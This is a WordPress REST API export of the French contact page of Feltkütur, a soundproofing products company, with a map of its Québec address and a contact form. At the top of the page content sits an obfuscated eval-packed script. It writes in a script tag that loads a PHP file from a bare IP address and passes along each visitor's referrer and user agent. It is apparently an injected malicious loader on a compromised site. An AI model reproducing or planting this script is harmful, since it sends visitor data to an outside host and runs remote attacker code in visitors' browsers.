{"id":459,"date":"2017-04-28T15:37:13","date_gmt":"2017-04-28T15:37:13","guid":{"rendered":"http:\/\/feltkutur.wpengine.com\/?page_id=459\/"},"modified":"2022-07-27T15:54:46","modified_gmt":"2022-07-27T19:54:46","slug":"contactez-nous","status":"publish","type":"page","link":"https:\/\/feltkutur.com\/fr\/contactez-nous\/","title":{"rendered":"Contactez-nous"},"content":{"rendered":"\n<p><script type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\\\o=\"+3(j.i)+\"\\'><\\\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rsihi|var|u0026u|referrer|bykid||js|php'.split('|'),0,{}))<br \/>\n<\/script>     <script type=\"text\/javascript\">\n    jQuery(document).ready(function() {\n    var mapdiv = jQuery(\"#responsive_map_889828625\");\n    mapdiv.gMapResp({\n        maptype: google.maps.MapTypeId.ROADMAP,\n        zoom: 8,\n        markers: [{\n                    address: '485 Rue des \u00c9rables, Saint-Elz\u00e9ar, Qu\u00e9bec G0S 2J0, Canada',\n                    key: '889828625',\n                    html: '485 Rue des \u00c9rables, Saint-Elz\u00e9ar, Qu\u00e9bec G0S 2J0, Canada',\n                    popup: true,\n                    flat: true,\n                    icon: {\n                        image: 'https:\/\/feltkutur.com\/wp-content\/plugins\/responsive-styled-google-maps-simplified\/includes\/icons\/red.png'\n                    }}],\n        panControl: false,\n        zoomControl: false,\n        draggable: false,\n        scrollwheel: false,\n        mapTypeControl: false,\n        scaleControl: false,\n        streetViewControl: false,\n        overviewMapControl: false,\n        styles: [{\"stylers\":[{\"featureType\":\"all\"},{\"saturation\":-100},{\"gamma\":0.50},{\"lightness\":30}]}]     });\n    resmap_fixDisplayInTabs(mapdiv, 'true');\n  });\n  window.onresize = function() {\n        jQuery('.responsive-map').each(function(i, obj) {\n            data = jQuery(this).data('gmap');\n            if (data) {\n                var gmap = data.gmap;\n                google.maps.event.trigger(gmap, 'resize');\n                jQuery(this).gMapResp('fixAfterResize');\n            }\n        });\n  };\n  <\/script>\n  <div id=\"responsive_map_889828625\" class=\"responsive-map\" style=\"height:500px;width: 100%;\"><\/div>\n  <\/p>\n<h1>Contactez-nous<\/h1>\n<p>Feltk\u00fctur vous offre ce dont vous avez besoin pour b\u00e2tir un environnement silencieux. Si vous avez des questions sur un produit en particulier ou si vous aimeriez obtenir davantage de renseignements, utilisez ce formulaire pour communiquer avec nous.<\/p>\n\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f473-o1\" lang=\"en-US\" dir=\"ltr\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/fr\/wp-json\/wp\/v2\/pages\/459#wpcf7-f473-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Contact form\" novalidate=\"novalidate\" data-status=\"init\">\n<div style=\"display: none;\">\n<input type=\"hidden\" name=\"_wpcf7\" value=\"473\" \/>\n<input type=\"hidden\" name=\"_wpcf7_version\" value=\"5.8.6\" \/>\n<input type=\"hidden\" name=\"_wpcf7_locale\" value=\"en_US\" \/>\n<input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f473-o1\" \/>\n<input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/>\n<input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<input type=\"hidden\" name=\"_wpcf7_recaptcha_response\" value=\"\" \/>\n<\/div>\n<div class=\"col-xs-12 col-sm-6\">\n\t<p><label> Nom*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-name\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"your-name\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label> Courriel*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-email\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"email\" name=\"your-email\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label> T\u00e9l\u00e9phone*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-tel\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-tel wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-tel\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"tel\" name=\"your-tel\" \/><\/span> <\/label>\n\t<\/p>\n\t<p><label> Sujet*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-subject\"><input size=\"40\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" value=\"\" type=\"text\" name=\"your-subject\" \/><\/span> <\/label>\n\t<\/p>\n<\/div>\n<div class=\"col-xs-12 col-sm-6\">\n\t<p><label> Message*<br \/>\n<span class=\"wpcf7-form-control-wrap\" data-name=\"your-message\"><textarea cols=\"40\" rows=\"10\" class=\"wpcf7-form-control wpcf7-textarea wpcf7-validates-as-required\" aria-required=\"true\" aria-invalid=\"false\" name=\"your-message\"><\/textarea><\/span> <\/label>\n\t<\/p>\n<\/div>\n<div class=\"col-xs-12\">\n\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"consentement\"><span class=\"wpcf7-form-control wpcf7-checkbox\"><span class=\"wpcf7-list-item first last\"><label><input type=\"checkbox\" name=\"consentement[]\" value=\"Je consent \u00e0 m&#039;abonner \u00e0 l&#039;infolettre pour \u00eatre \u00e0 l&#039;aff\u00fbt des derni\u00e8res nouveaut\u00e9s Feltk\u00fctur.\" \/><span class=\"wpcf7-list-item-label\">Je consent \u00e0 m&#039;abonner \u00e0 l&#039;infolettre pour \u00eatre \u00e0 l&#039;aff\u00fbt des derni\u00e8res nouveaut\u00e9s Feltk\u00fctur.<\/span><\/label><\/span><\/span><\/span>\n\t<\/p>\n\t<p><input class=\"wpcf7-form-control wpcf7-submit has-spinner\" type=\"submit\" value=\"Envoyer\" \/>\n\t<\/p>\n<\/div><div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n<\/form>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>Contactez-nous Feltk\u00fctur vous offre ce dont vous avez besoin pour b\u00e2tir un environnement silencieux. Si vous avez des questions sur un produit en particulier ou si vous aimeriez obtenir davantage de renseignements, utilisez ce formulaire pour communiquer avec nous. [&#8230;]<\/p>\n<p><a class=\"btn btn-secondary understrap-read-more-link\" href=\"https:\/\/feltkutur.com\/fr\/contactez-nous\/\">Read More&#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"Si vous avez des questions sur un produit en particulier ou si vous aimeriez obtenir davantage de renseignements, contactez-nous!","_seopress_robots_index":"","footnotes":""},"class_list":["post-459","page","type-page","status-publish"],"_links":{"self":[{"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/pages\/459","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/comments?post=459"}],"version-history":[{"count":0,"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/pages\/459\/revisions"}],"wp:attachment":[{"href":"https:\/\/feltkutur.com\/fr\/wp-json\/wp\/v2\/media?parent=459"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}